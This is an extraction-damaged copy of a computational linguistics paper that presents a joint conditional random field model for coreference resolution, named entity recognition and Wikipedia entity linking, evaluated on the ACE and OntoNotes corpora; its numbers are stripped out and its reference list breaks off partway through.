https://doi.org/ . /j.ejor. . . https://doi.org/ . /s - - - https://doi.org/ . /zoo. a joint model for entity analysis: coreference, typing, and linking greg durrett and dan klein computer science division university of california, berkeley {gdurrett,klein}@cs.berkeley.edu abstract we present a joint model of three core tasks in the entity analysis stack: coreference res- olution (within-document clustering), named entity recognition (coarse semantic typing), and entity linking (matching to wikipedia en- tities). our model is formally a structured con- ditional random field. unary factors encode local features from strong baselines for each task. we then add binary and ternary factors to capture cross-task interactions, such as the constraint that coreferent mentions have the same semantic type. on the ace and ontonotes datasets, we achieve state-of-the- art results for all three tasks. moreover, joint modeling improves performance on each task over strong independent baselines. introduction how do we characterize the collection of entities present in a document? two broad threads exist in the literature. the first is coreference resolution (soon et al., ; ng, ; pradhan et al., ), which identifies clusters of mentions in a document referring to the same entity. this process gives us ac- cess to useful information about the referents of pro- nouns and nominal expressions, but because clusters are local to each document, it is often hard to situate document entities in a broader context. a separate line of work has considered the problem of entity linking or “wikification” (cucerzan, ; milne and witten, ; ji and grishman, ), where mentions are linked to entries in a given knowledge system available at http://nlp.cs.berkeley.edu base. this is useful for grounding proper entities, but in the absence of coreference gives an incom- plete picture of document content itself, in that nom- inal expressions and pronouns are left unresolved. in this paper, we describe a joint model of corefer- ence, entity linking, and semantic typing (named en- tity recognition) using a structured conditional ran- dom field. variables in the model capture deci- sions about antecedence, semantic type, and entity links for each mention. unary factors on these vari- ables incorporate features that are commonly em- ployed when solving each task in isolation. bi- nary and higher-order factors capture interactions between pairs of tasks. for entity linking and ner, factors capture a mapping between ner’s seman- tic types and wikipedia’s semantics as described by infoboxes, categories, and article text. coreference interacts with the other tasks in a more complex way, via factors that softly encourage consistency of semantic types and entity links across coreference arcs, similar to the method of durrett et al. ( ). figure shows an example of the effects such fac- tors can capture. the non-locality of coreference factors make exact inference intractable, but we find that belief propagation is a suitable approximation technique and performs well. our joint modeling of these three tasks is moti- vated by their heavy interdependencies, which have been noted in previous work (discussed more in section ). entity linking has been employed for coreference resolution (ponzetto and strube, ; rahman and ng, ; ratinov and roth, ) and coreference for entity linking (cheng and roth, ) as part of pipelined systems. past work has transactions of the association for computational linguistics, vol. , pp. – , . action editor: jason eisner. submitted / ; revised / ; published november , . c© association for computational linguistics. revenues of $ . billion were posted by dell . the company ... en.wikipedia.org/wiki/dell en.wikipedia.org/wiki/michael_dell infobox type: company infobox type: person organization person figure : coreference can help resolve ambiguous cases of semantic types or entity links: propagating information across coreference arcs can inform us that, in this context, dell is an organization and should therefore link to the article on dell in wikipedia. shown that tighter integration of coreference and entity linking is promising (hajishirzi et al., ; zheng et al., ); we extend these approaches and model the entire process more holistically. named entity recognition is improved by simple coreference (finkel et al., ; ratinov and roth, ) and knowledge from wikipedia (kazama and torisawa, ; ratinov and roth, ; nothman et al., ; sil and yates, ). joint models of corefer- ence and ner have been proposed in haghighi and klein ( ) and durrett et al. ( ), but in neither case was supervised data used for both tasks. tech- nically, our model is most closely related to that of singh et al. ( ), who handle coreference, named entity recognition, and relation extraction. our sys- tem is novel in three ways: the choice of tasks to model jointly, the fact that we maintain uncertainty about all decisions throughout inference (rather than using a greedy approach), and the feature sets we deploy for cross-task interactions. in designing a joint model, we would like to preserve the modularity, efficiency, and structural simplicity of pipelined approaches. our model’s feature-based structure permits improvement of fea- tures specific to a particular task or to a pair of tasks. by pruning variable domains with a coarse model and using approximate inference via belief propaga- tion, we maintain efficiency and our model is only a factor of two slower than the union of the individual our model could potentially be extended to handle relation extraction or mention detection, which has also been addressed in past joint modeling efforts (daumé and marcu, ; li and ji, ), but that is outside the scope of the current work. models. finally, as a structured crf, it is concep- tually no more complex than its component models and its behavior can be understood using the same intuition. we apply our model to two datasets, ace and ontonotes, with different mention standards and layers of annotation. in both settings, our joint model outperforms our independent baseline mod- els. on ace, we achieve state-of-the-art entity link- ing results, matching the performance of the system of fahrni and strube ( ). on ontonotes, we match the performance of the best published coref- erence system (björkelund and kuhn, ) and outperform two strong ner systems (ratinov and roth, ; passos et al., ). motivating examples we first present two examples to motivate our ap- proach. figure shows an example of a case where coreference is beneficial for named entity recogni- tion and entity linking. the company is clearly coreferent to dell by virtue of the lack of other possi- ble antecedents; this in turn indicates that dell refers to the corporation rather than to michael dell. this effect can be captured for entity linking by a fea- ture tying the lexical item company to the fact that company is in the wikipedia infobox for dell, thereby helping the linker make the correct decision. this would also be important for recovering the fact that the mention the company links to dell; how- ever, in the version of the task we consider, a men- tion like the company actually links to the wikipedia article for company. figure shows a different example, one where the coreference is now ambiguous but entity linking is transparent. in this case, an ner system based on surface statistics alone would likely predict that freddie mac is a person. however, the wikipedia article for freddie mac is unambiguous, which al- lows us to fix this error. the pronoun his can then be correctly resolved. these examples justify why these tasks should be handled jointly: there is no obvious pipeline order for a system designer who cares about the perfor- monospaced fonts indicate titles of wikipedia articles. this decision was largely driven by a need to match the ace linking annotations provided by bentivogli et al. ( ). organization person donald layton took the helm of freddie mac after his ... nil en.wikipedia.org/wiki/freddie_mac person figure : entity links can help resolve ambiguous cases of coreference and entity types. standard ner and coreference systems might fail to handle freddie mac correctly, but incorporating semantic information from wikipedia makes this decision easier. mance of the model on all three tasks. model our model is a structured conditional random field (lafferty et al., ). the input (conditioning con- text) is the text of a document, automatic parses, and a set of pre-extracted mentions (spans of text). mentions are allowed to overlap or nest: our model makes no structural assumptions here, and in fact we will show results on datasets with two different men- tion annotation standards (see section . and sec- tion . ). figure shows the random variables in our model. we are trying to predict three distinct types of annotation, so we naturally have one variable per annotation type per mention (of which there are n): • coreference variables a = (a , . . . ,an) which indicate antecedents: ai ∈{ , . . . , i− , new}, indicating that the mention refers to some pre- vious mention or that it begins a new cluster. • named entity type variables t = (t , . . . , tn) which take values in a fixed inventory of se- mantic types. • entity link variables e = (e , . . . ,en) which take values in the set of all wikipedia titles. in addition we have variables q = (q , . . . ,qn) which represent queries to wikipedia. these are ex- plained further in section . . ; for now, it suffices for the next few sections, we assume a fixed-mention ver- sion of the ner task, which looks like multi-way classification of semantic types. in section . . , we adapt the model to the standard non-fixed-mention setting for ontonotes. } dell posted revenues ... the company ... } dell michael_dell ... new cluster dellnew cluster } company company (song) ... } }person organization ... }person organization ... }the company company company }dell dell n e r c or ef l in k q q e e a a t t figure : random variables and task-specific factors present in our model. the ai model coreference an- tecedents, the ti model semantic types, the ei model en- tity links, and the qi are latent wikipedia queries. factors shown for each task integrate baseline features used when that task is handled in isolation. coreference factors are described in section . . , ner factors are described in section . . , and entity linking factors are described in section . . . to remark that they are unobserved during both train- ing and testing. we place a log-linear probability distribution over these variables as follows: p(a,t,e|x; θ) ∝ ∑ q exp ( θ>f(a,t,e,q,x) ) where θ is a weight vector, f is a feature function, and x indicates the document text, automatic parses, and mention boundaries. we represent the features in this model with stan- dard factor graph notation; features over a particular set of output variables (and x) are associated with factors connected to those variables. figure shows the task-specific factors in the model, discussed next in section . . higher-order factors coupling vari- ables between tasks are discussed in section . . . independent model figure shows a version of the model with only task-specific factors. though this framework is structurally simple, it is nevertheless powerful enough for us to implement high-performing models for each task. state-of-the-art approaches to coref- erence (durrett and klein, ) and entity linking (ratinov et al., ) already have this independent structure and ratinov and roth ( ) note that it is a reasonable assumption to make for ner as well. in this section, we describe the features present in the task-specific factors of each type (which also serve as our three separate baseline systems). . . coreference our modeling of the coreference output space (as antecedents chosen for each mention) follows the mention-ranking approach to coreference (de- nis and baldridge, ; durrett and klein, ). our feature set is that of durrett and klein, target- ing surface properties of mentions: for each men- tion, we examine the first word, head word, last word, context words, the mention’s length, and whether the mention is nominal, proper or pronom- inal. anaphoricity features examine each of these properties in turn; coreference features conjoin var- ious properties between mention pairs and also use properties of the mention pair itself, such as the dis- tance between the mentions and whether their heads match. note that this baseline does not rely on hav- ing access to named entity chunks. . . named entity recognition our ner model places a distribution over possi- ble semantic types for each mention, which corre- sponds to a fixed span of the input text. we define the features of a span to be the concatenation of stan- dard ner surface features associated with each to- ken in that chunk. we use surface token features similar to those from previous work (zhang and johnson, ; ratinov and roth, ; passos et al., ): for tokens at offsets of {− ,− , , , } from the current token, we fire features based on ) word identity, ) pos tag, ) word class (based on capitalization, presence of numbers, suffixes, etc.), ) word shape (based on the pattern of uppercase and lowercase letters, digits, and punctuation), ) brown cluster prefixes of length , , , using the clus- ters from koo et al. ( ), and ) common bigrams of word shape and word identity. pairwise potentials in sequence-based ner are useful for producing coherent output (e.g. prohibiting configurations like o i-per), but since we have so far defined the task as operating over fixed mentions, this structural constraint does not come into play for our system. . . entity linking our entity linking system diverges more sub- stantially from past work than the coreference or ner systems. most entity linking systems oper- ate in two distinct phases (cucerzan, ; milne and witten, ; dredze et al., ; ratinov et al., ). first, in the candidate generation phase, a system generates a ranked set of possi- ble candidates for a given mention by querying wikipedia. the standard approach for doing so is to collect all hyperlinks in wikipedia and associate each hyperlinked span of text (e.g. michael jor- dan) with a distribution over titles of wikipedia ar- ticles it is observed to link to (michael jordan, michael i. jordan, etc.). second, in the dis- ambiguation phase, a learned model selects the cor- rect candidate from the set of possibilities. as noted by hachey et al. ( ) and guo et al. ( ), candidate generation is often overlooked and yet accounts for large gaps in performance between different systems. it is not always clear how to best turn the text of a mention into a query for our set of hyperlinks. for example, the phrase chief exec- utive michael dell has never been hyperlinked on wikipedia. if we query the substring michael dell, the highest-ranked title is correct; however, querying the substring dell returns the article on the company. our model for entity linking therefore includes both predictions of final wikipedia titles ei as well as latent query variables qi that model the choice of query. given a mention, possible queries are all pre- fixes of the mention containing the head with op- tional truecasing or lemmatization applied. unary factors on the qi model the appropriateness of a query based on surface text of the mention, in- vestigating the following properties: whether the mention is proper or nominal, whether the query employed truecasing or lemmatization, the query’s length, the pos tag sequence within the query and the tag immediately preceding it, and whether the query is the longest query to yield a nonempty set of candidates for the mention. this part of the model can learn, for example, that queries based on lemma- tized proper names are bad, whereas queries based on lemmatized common nouns are good. our set of candidates links for a mention is the set of all titles produced by some query. the bi- a a e e q q t dell ne r+ co ref li nk +c ore f ne r+ li nk the company ... posted ... t n e r c or ef l in k figure : factors that tie predictions between variables across tasks. joint ner and entity linking factors (sec- tion . . ) tie semantic information from wikipedia ar- ticles to semantic type predictions. joint coreference and ner factors (section . . ) couple type decisions between mentions, encouraging consistent type assign- ments within an entity. joint coreference and entity link- ing factors (section . . ) encourage relatedness between articles linked from coreferent mentions. nary factors connecting qi and ei then decide which title a given query should yield. these include: the rank of the article title among all possible ti- tles returned by that query (sorted by relative fre- quency count), whether the title is a close string match of the query, and whether the title matches the query up to a parenthetical (e.g. paul allen and paul allen (editor)). we could also at this point add factors between pairs of variables (ei,ej) to capture coherence be- tween choices of linked entities. integration with the rest of the model, learning, and inference would re- main unchanged. however, while such features have been employed in past entity linking systems (rati- nov et al., ; hoffart et al., ), ratinov et al. found them to be of limited utility, so we omit them from the present work. . cross-task interaction factors we now add factors that tie the predictions of multi- ple output variables in a feature-based way. figure shows the general structure of these factors. each couples variables from one pair of tasks. . . entity linking and ner we want to exploit the semantic information in wikipedia for better semantic typing of mentions. we also want to use semantic types to disambiguate tricky wikipedia links. we use three sources of semantics from wikipedia (kazama and torisawa, ; nothman et al., ): • categories (e.g. american financiers); used by ponzetto and strube ( ; kazama and torisawa ( ; ratinov and roth ( ) • infobox type (e.g. person, company) • copula in the first sentence (is a british politician); used for coreference previously in haghighi and klein ( ) we fire features that conjoin the information from the selected wikipedia article with the selected ner type. because these types of information from wikipedia are of a moderate granularity, we should be able to learn a mapping between them and ner types and exploit wikipedia as a soft gazetteer. . . coreference and ner coreference can improve ner by ensuring con- sistent semantic type predictions across coreferent mentions; likewise, ner can help coreference by encouraging the system to link up mentions of the same type. the factors we implement for these pur- poses closely resemble the factors employed for la- tent semantic clusters in durrett et al. ( ). that structure is as follows: log fi−j(ai, ti, tj) = { if ai = j f(i,j,ti, tj) otherwise that is, the features between the type variables for mentions i and j does not come into play unless i and j are coreferent. note that there are quadrati- cally many such factors in the graph (before prun- ing; see section ), one for each ordered pair of mentions (j,i) with j < i. when scoring a partic- ular configuration of variables, only a small subset of the factors is active, but during inference when we marginalize over all settings of variables, each of the factors comes into play for some configuration. this model structure allows us to maintain uncer- tainty about coreference decisions but still propagate information along coreference arcs in a soft way. given this factor definition, we define features that should fire over coreferent pairs of entity types. our features target: • the pair of semantic types for the current and antecedent mention • the semantic type of the current mention and the head of the antecedent mention, and the type of the antecedent and head of the current we found such monolexical features to improve over just type pairs and while not suffering from the spar- sity problems of bilexical features. . . coreference and entity linking as we said in section , coreferent mentions can actually have different entity links (e.g. dell and company), so encouraging equality alone is less ef- fective for entity linking than it is for ner. our fac- tors have the same structure as those for coreference- ner, but features now target overall semantic relat- edness of wikipedia articles using the structure of wikipedia by computing whether the articles have the same title, share any out links, or link to each other. more complex relatedness schemes such as those described in ratinov et al. ( ) can be im- plemented in this framework. nevertheless, these basic features still promise to help identify related articles as well as name variations by exploiting the abundance of entity mentions on wikipedia. learning our training data consists of d documents, where a given document consists of a tuple (x,c∗,t∗,e∗). gold-standard labels for types (t∗) and entity links (e∗) are provided directly, while supervision for coreference is provided in the form of a clustering c∗. regardless, we can simply marginalize over the uncertainty about a∗ and form the conditional log- likelihood of the training labels as follows: l(θ) = d∑ i= log ∑ a∗∈a(c∗i ) p(a∗,t∗i ,e ∗ i |x; θ) where a(c∗) is the set of antecedent structures con- sistent with the gold annotation: the first mention in a cluster must pick the new label and subsequent mentions must pick an antecedent from the set of those preceding them in the cluster. this marginal- ization over latent structure has been employed in prior work as well (fernandes et al., ; durrett and klein, ). we adapt this objective to exploit parameterized loss functions for each task by modifying the distri- bution as follows: p′(a,t,e|x; θ) ∝ p(a,t,e,x) exp [αc`c(a,c∗) +αt`t(t,t ∗) + αe`e(e,e ∗)] where `c, `t, and `e are task-specific loss functions with weight parameters α. this technique, softmax- margin, allows us to shape the distribution learned by the model and encourage the model to move probability mass away from outputs that are bad ac- cording to our loss functions (gimpel and smith, ). as in durrett and klein ( ), we take αc = and use `c as defined there, penalizing the model by αc,fa = . for linking up a mention that should have been nonanaphoric, by αc,fn = for calling nonanaphoric a mention that should have an antecedent, and by αc,wl = for picking the wrong antecedent for an anaphoric mention. `t and `e are simply hamming distance, with αt = and αe = for all experiments. we found that the outcome of learning was not particularly sensitive to these pa- rameters. we optimize our objective using adagrad (duchi et al., ) with l regularization and λ = . . our final objective is l(θ) = d∑ i= log ∑ a∗∈a(c∗i ) p′(a∗,t∗i ,e ∗ i |x; θ)+λ‖θ‖ this objective is nonconvex, but in practice we have found that it is very stable. one reason is that for any mention that has fewer than two antecedents in its cluster, all elements of a(c∗) only contain one possibility for that mention, and even for mentions with ambiguity, the parameters that the model ends up learning tend to place almost all of the probability mass consistently on one antecedent. these parameters allow us to trade off contributions to the objective from the different tasks, addressing singh et al. ( )’s objection to single objectives for joint models. dev test muc b ceafe avg. ner link muc b ceafe avg. ner link indep. . . . . . . . . . . . . joint . . . . . . . . . . . . ∆ + . + . + . + . + . + . + . − . + . + . + . + . table : results on the ace dev and test sets for the indep. (task-specific factors only) and joint models. coreference metrics are computed using their reference implementations (pradhan et al., ). we report accuracy on ner because the set of mentions is fixed and all mentions have named entity types. coreference and ner are compared to prior work in a more standard setting in section . . finally, we also report accuracy of our entity linker (including links to nil); entity linking is analyzed more thoroughly in table . bolded values represent statistically significant improvements with p < . according to a bootstrap resampling test. inference for both learning and decoding, inference consists of computing marginals for individual variables or for sets of variables adjacent to a factor. exact infer- ence is intractabile due to our factor graph’s loopi- ness; however, we can still perform efficient infer- ence using belief propagation, which has been suc- cessfully employed for a similar model (durrett et al., ) as well as for other nlp tasks (smith and eisner, ; burkett and klein, ). marginals typically converge in - iterations of belief propa- gation; we use iterations for all experiments. however, belief propagation would still be quite computationally expensive if run on the full fac- tor graph as described in section . in particu- lar, the factors in section . . and section . . are costly to sum over due to their ternary struc- ture and the fact that there are quadratically many of them in the number of mentions. the solu- tion to this is to prune the domains of the corefer- ence variables using a coarse model consisting of the coreference factors trained in isolation. given marginals p (ai|x), we prune values ai such that log p (ai|x) < log p (a∗i |x) −k for a threshold pa- rameter k, which we set to for our experiments; this is sufficient to prune over % of possible coref- erence arcs while leaving at least one possible gold link for % of mentions. with this optimization, our full joint model could be trained for iterations on the ace corpus in around an hour. we use minimum bayes risk (mbr) decoding, in addition to inferential benefits, pruning an arc allows us to prune entire joint coreference factors and avoid instantiating their associated features, which reduces the memory footprint and time needed to build a factor graph. where we compute marginals for each variable un- der the full model and independently return the most likely setting of each variable. note that for coref- erence, this implies that we produce the mbr an- tecedent structure rather than the mbr clustering; the latter is much more computationally difficult to find and would be largely the same, since the poste- rior distributions of the ai are quite peaked. experiments we present results on two corpora. first, we use the ace corpus (nist, ): this corpus anno- tates mentions complete with coreference, semantic types (per mention), and entity links (also per men- tion) later added by bentivogli et al. ( ). we evaluate on gold mentions in this setting for com- parability with prior work on entity linking; we lift this restriction in section . . second, we evaluate on the ontonotes corpus (hovy et al., ) as used in the conll coreference shared task (pradhan et al., ). this corpus does not contain gold-standard entity links, so we cannot evaluate this portion of our model, though the model still exploits the information from wikipedia to make coreference and named entity de- cisions. we will compare to prior coreference and named entity work in the system mentions setting. . ace evaluation we tokenize and sentence-split the ace dataset us- ing the tools bundled with reconcile (stoyanov et al., ) and parse it using the berkeley parser (petrov et al., ). we use the train/test split from stoyanov et al. ( ), haghighi and klein ( ), and bansal and klein ( ). non-nils nils prec. rec. f prec. rec. f accuracy fahrni . . . . . . . indep. . . . . . . . joint . . . . . . . ∆ over indep. + . + . + . + . + . + . + . table : detailed entity linking results on the ace test set. we evaluate both our indep. (task-specific factors only) and joint models and compare to the results of the fahrni model, a state-of-the-art entity linking system. we compare overall accuracy as well as performance at predicting nils (mentions not in the knowledge base) and non- nils. the joint model roughly matches the performance of fahrni and gives strong gains over the indep. system. table shows our results. coreference results are reported using muc (vilain et al., ), b (bagga and baldwin, ), and ceafe (luo, ), as well as their average, the conll metric, all com- puted from the reference implementation of the conll scorer (pradhan et al., ). we see that the joint model improves all three tasks compared to the individual task models in the baseline. more in-depth entity linking results are shown in table . we both evaluate on overall accuracy (how many mentions are correctly linked) as well as two more specific criteria: precision/recall/f of non- nil predictions, and precision/recall/f of nil pre- dictions. this latter measure may be important if a system designer is trying to identify new entities in a document. we compare to the results of the best model from fahrni and strube ( ), which is a sophisticated discriminative model incorporating a latent model of mention scope. our performance is similar to that of fahrni and strube ( ), though the results are not exactly comparable for two reasons. first, our models are trained on different datasets: fahrni and strube ( ) train on wikipedia data whereas we train on the ace training set. second, they make use of the annotated head spans in ace whereas we only use detected heads based on automatic parses. note that this information is particularly beneficial for locat- ing the right query because “heads” may be multi- word expressions such as west bank as part of the phrase southern west bank. nil is a placeholder for mentions which do not link to an article in wikipedia. on the tac datasets, this fahrni model substantially out- performs ratinov et al. ( ) and has comparable performance to cheng and roth ( ), hence it is quite competitive. coref ner link indep. . . . indep+linkner + . + . indep+corefner + . + . indep+coreflink + . − . joint−linkner + . + . − . joint−corefner + . + . + . joint−coreflink + . + . + . joint + . + . + . joint/latentlink + . + . − . table : results of model ablations on the ace devel- opment set. we hold out each type of factor in turn from the joint model and add each in turn over the in- dep. model. we evaluate the coreference performance using the conll metric, ner accuracy, and entity link- ing accuracy. . model ablations to evaluate the importance of the different parts of the model, we perform a series of ablations on the model interaction factors. table shows the results of adding each interaction factor in turn to the base- line and removing each of the three interaction fac- tors from the full joint model (see figure ). link–ner interactions. these joint factors are the strongest out of any considered here and give large improvements to entity linking and ner. their utility is unsurprising: effectively, they give ner ac- cess to a gazetteer that it did not have in the baseline model. moreover, our relatively rich featurization of the semantic information on wikipedia allows the model to make effective use of it. coref–ner interactions. these are moderately beneficial to both coreference and ner. having re- liable semantic types allows the coreference system to be bolder about linking up mention pairs that do not exhibit direct head matches. part of this is due to our use of monolexical features, which are fine- grained enough to avoid the problems with coarse semantic type matching (durrett and klein, ) but still effectively learnable. coref–link interactions. these are the least use- ful of any of the major factors, providing only a small benefit to coreference. this is likely a re- sult of the ace entity linking annotation standard: a mention like the company is not linked to the spe- cific company it refers to, but instead the wikipedia article company. determining the relatedness of company to an article like dell is surprisingly difficult: many related articles share almost no out- links and may not explicitly link to one another. further feature engineering could likely improve the utility of these factors. the last line of table shows the results of an ex- periment where the entity links were not observed during training, i.e. they were left latent. unsur- prisingly, the system is not good at entity linking; however, the model is still able to do as well or even slightly better on coreference and named entity recognition. a possible explanation for this is that even the wrong wikipedia link can in many cases provide correct semantic information: for example, not knowing which donald layton is being referred to is irrelevant for the question of determining that he is a person and may also have little impact on coreference performance. this result indicates that the joint modeling approach is not necessarily de- pendent on having all tasks annotated. the model can make use of cross-task information even when that information comes via latent variables. . ontonotes evaluation the second part of our evaluation uses the datasets from the conll shared task (pradhan et al., ), specifically the coreference and ner anno- tations. all experiments use the standard automatic parses from the shared task and mentions detected according to the method of durrett and klein ( ). evaluating on ontonotes carries with it a few complications. first, gold-standard entity linking annotations are not available; we can handle this by a a e e q q t t dell }o b-org i-org ... ... ne r+ co ref li nk +c ore f ne r+ li nk the company ... t t posted ... figure : modified factor graph for ontonotes-style an- notations, where ner chunks can now diverge from men- tions for the other two tasks. ner is now modeled with token-synchronous random variables taking values in a bio tagset. factors coupling ner and the other tasks now interact with the ner chain via the ner nodes as- sociated with the heads of mentions. leaving the ei variables in our model latent. second, and more seriously, ner chunks are no longer the same as coreference mentions, so our assumption of fixed ner spans no longer holds. . . divergent coreference and ner our model can be adapted to handle ner chunks that diverge from mentions for the other two tasks, as shown in figure . we have kept the coreference and entity linking portions of our model the same, now defined over system predicted mentions. however, we have replaced mention-synchronous type vari- ables with standard token-synchronous bio-valued variables. the unary ner features developed in section . . are now applied in the standard way, namely they are conjoined with the bio labels at each token position. binary factors between adja- cent ner nodes enforce appropriate structural con- straints and fire indicator features on transitions. in order to maintain tractability in the face of a larger number of variables and factors in the ner portion of our model, we prune the ner variables’ domains using the ner model trained in isolation, similar to the procedure that we described for pruning corefer- ence arcs in section . muc b ceafe avg. prec. rec. f prec. rec. f prec. rec. f f berkeley . . . . . . . . . . fernandes − − . − − . − − . . bjorkelund . . . . . . . . . . indep. . . . . . . . . . . joint . . . . . . . . . . table : conll metric scores for our systems on the conll blind test set, compared to durrett and klein ( ) (the berkeley system), fernandes et al. ( ) (the winner of the conll shared task), and björkelund and kuhn ( ) (the best reported results on the dataset to date). indep. and joint are the contributions of this work; joint improves substantially over indep. (these improvements are statistically significant with p < . according to a bootstrap resampling test) and achieves state-of-the-art results. cross-task factors that previously would have fired features based on the ne type for a whole men- tion now instead consult the ne type of that men- tion’s head. in figure , this can be seen with fac- tors involving e and a touching t (company), the head of the second mention. since the chain struc- ture enforces consistency between adjacent labels, features that strongly prefer a particular label on one node of a mention will implicitly affect other nodes in that mention and beyond. training and inference proceed as before, with a slight modification: instead of computing the mbr setting of every variable in isolation, we instead compute the mbr sequence of labeled ner chunks to avoid the problem of producing inconsistent tag sequences, e.g. o i-per or b-per i-org. . . results table shows coreference results from our in- dep. and joint models compared to three strong systems: durrett and klein ( ), fernandes et al. ( ) (the winner of the conll shared task), and björkelund and kuhn ( ) (the best reported re- sults on the dataset). our joint method outper- forms all three as well as the indep. system. next, we report results on named entity recogni- tion. we use the same ontonotes splits as for the coreference data; however, the new testament (nt) the ner-coreference portion of the model now resembles the skip-chain crf from finkel et al. ( ), though with soft coreference. the systems of chang et al. ( ) and webster and curran ( ) perform similarly to the fernandes system; changes in the reference implementation of the metrics make exact com- parison to printed numbers difficult. prec. rec. f illinois . . . passos − − . indep. . . . joint . . . ∆ over indep. + . + . + . table : results for ner tagging on the ontonotes . / conll test set. we compare our systems to the illinois system (ratinov and roth, ) and the system of passos et al. ( ). our model outperforms both other systems in terms of f , and once again joint modeling gives substantial improvements over our baseline system. portion of the conll test set does not have gold-standard named entity annotations, so we omit it from our evaluation. this leaves us with exactly the conll test set. we compare to two ex- isting baselines from the literature: the illinois ner system of ratinov and roth ( ) and the results of passos et al. ( ). table shows that we out- perform both prior systems in terms of f , though the illinois system features higher recall while our system features higher precision. related work there are two closely related threads of prior work: those that address the tasks we consider in a dif- ferent way and those that propose joint models for other related sets of tasks. in the first category, hajishirzi et al. ( ) integrate entity linking into a sieve-based coreference system (raghunathan et al., ), the aim being to propagate link deci- sions throughout coreference chains, block corefer- ence links between different entities, and use seman- tic information to make additional coreference links. zheng et al. ( ) build coreference clusters greed- ily left-to-right and maintain entity link information for each cluster, namely a list of possible targets in the knowledge base as well as a current best link tar- get that is used to extract features (though that might not be the target that is chosen by the end of infer- ence). cheng and roth ( ) use coreference as a preprocessing step for entity linking and then solve an ilp to determine the optimal entity link assign- ments for each mention based on surface properties of that mention, other mentions in its cluster, and other mentions that it is related to. compared to these systems, our approach maintains greater un- certainty about all random variables throughout in- ference and uses features to capture cross-task in- teractions as opposed to rules or hard constraints, which can be less effective for incorporating seman- tic knowledge (lee et al., ). the joint model most closely related to ours is that of singh et al. ( ), modeling coreference, named entity recognition, and relation extraction. their techniques differ from ours in a few notable ways: they choose a different objective function than we do and also opt to freeze the values of certain vari- ables during the belief propagation process rather than pruning with a coarse pass. sil and yates ( ) jointly model ner and entity linking in such a way that they maintain uncertainty over mention bound- aries, allowing information from wikipedia to in- form segmentation choices. we could strengthen our model by integrating this capability; however, the primary cause of errors for mention detection on ontonotes is parsing ambiguities rather than named entity ambiguities, so we would be unlikely to see improvements in the experiments presented here. beyond maintaining uncertainty over men- tion boundaries, we might also consider maintain- ing uncertainty over the entire parse structure, as in finkel and manning ( ), who consider parsing and named entity recognition together with a pcfg. conclusion we return to our initial motivation for joint model- ing, namely that the three tasks we address have the potential to influence one another. table shows that failing to exploit any of the pairwise interac- tions between the tasks causes lower performance on at least one of them. therefore, any pipelined sys- tem would necessarily underperform a joint model on whatever task came first in the pipeline, which is undesirable given the importance of these tasks. the trend towards broader and deeper nlp pipelines will only exacerbate this problem and make it more dif- ficult to find a suitable pipeline ordering. in addition to showing that joint modeling is high-performing, we have also shown that it can be implemented with relatively low overhead, requiring no fundamentally new learning or inference techniques, and that it is extensible, due to its modular structure and natural partitioning of features. taken together, these as- pects make a compelling case that joint models can provide a way to integrate deeper levels of process- ing, particularly for semantic layers of annotation, and that this modeling power does not need to come at the expense of computational efficiency, structural simplicity, or modularity. the berkeley entity resolution system is avail- able at http://nlp.cs.berkeley.edu. acknowledgments this work was partially supported by bbn under darpa contract hr - -c- , by an nsf fellowship for the first author, and by a google fac- ulty research award to the second author. thanks to angela fahrni for helpful discussions about en- tity linking and for providing system output, to the anonymous reviewers for their insightful comments, and to our action editor jason eisner. references amit bagga and breck baldwin. . algorithms for scoring coreference chains. in proceedings of the conference on language resources and evaluation workshop on linguistics coreference. mohit bansal and dan klein. . coreference seman- tics from web features. in proceedings of the associ- ation for computational linguistics. luisa bentivogli, pamela forner, claudio giuliano, alessandro marchetti, emanuele pianta, and kateryna tymoshenko. . extending english ace corpus annotation with ground-truth links to wikipedia. in proceedings of the workshop on the people’s web meets nlp: collaboratively con- structed semantic resources. anders björkelund and jonas kuhn. . learn- ing structured perceptrons for coreference resolution with latent antecedents and non-local features. in proceedings of the association for computational lin- guistics. david burkett and dan klein. . fast inference in phrase extraction models with belief propagation. in proceedings of the north american chapter of the as- sociation for computational linguistics. kai-wei chang, rajhans samdani, and dan roth. . a constrained latent variable model for coreference resolution. in proceedings of the conference on em- pirical methods in natural language processing. xiao cheng and dan roth. . relational inference for wikification. in proceedings of the conference on empirical methods in natural language processing. silviu cucerzan. . large-scale named entity dis- ambiguation based on wikipedia data. in proceed- ings of the joint conference on empirical methods in natural language processing and computational natural language learning (emnlp-conll). hal daumé, iii and daniel marcu. . a large-scale exploration of effective global features for a joint entity detection and tracking model. in proceedings of the conference on empirical methods in natural language processing. pascal denis and jason baldridge. . specialized models and ranking for coreference resolution. in proceedings of the conference on empirical methods in natural language processing. mark dredze, paul mcnamee, delip rao, adam ger- ber, and tim finin. . entity disambiguation for knowledge base population. in proceedings of the in- ternational conference on computational linguistics. john duchi, elad hazan, and yoram singer. . adaptive subgradient methods for online learning and stochastic optimization. journal of machine learning research, : – , july. greg durrett and dan klein. . easy victories and uphill battles in coreference resolution. in proceed- ings of the conference on empirical methods in natu- ral language processing, october. greg durrett, david hall, and dan klein. . decen- tralized entity-level modeling for coreference reso- lution. in proceedings of the association for compu- tational linguistics. angela fahrni and michael strube. . a latent variable model for discourse-aware concept and en- tity disambiguation. in proceedings of the european chapter of the association for computational linguis- tics. eraldo rezende fernandes, cı́cero nogueira dos santos, and ruy luiz milidiú. . latent structure per- ceptron with feature induction for unrestricted coref- erence resolution. in proceedings of the joint con- ference on empirical methods in natural language proceedings and conference on computational nat- ural language learning - shared task. jenny rose finkel and christopher d. manning. . joint parsing and named entity recognition. in pro- ceedings of the north american chapter for the asso- ciation for computational linguistics. jenny rose finkel, trond grenager, and christopher manning. . incorporating non-local information into information extraction systems by gibbs sam- pling. in proceedings of the association for computa- tional linguistics. kevin gimpel and noah a. smith. . softmax- margin crfs: training log-linear models with cost functions. in proceedings of the north american chapter for the association for computational lin- guistics. yuhang guo, bing qin, yuqin li, ting liu, and sheng li li. . improving candidate generation for entity linking. in natural language processing and infor- mation systems. ben hachey, will radford, joel nothman, matthew hon- nibal, and james r. curran. . evaluating en- tity linking with wikipedia. artificial intelligence, : – , january. aria haghighi and dan klein. . simple coreference resolution with rich syntactic and semantic features. in proceedings of the conference on empirical meth- ods in natural language processing. aria haghighi and dan klein. . coreference res- olution in a modular, entity-centered model. in pro- ceedings of the north american chapter of the asso- ciation for computational linguistics. hannaneh hajishirzi, leila zilles, daniel s. weld, and luke zettlemoyer. . joint coreference res- olution and named-entity linking with multi-pass sieves. in proceedings of the conference on empir- ical methods in natural language processing. johannes hoffart, 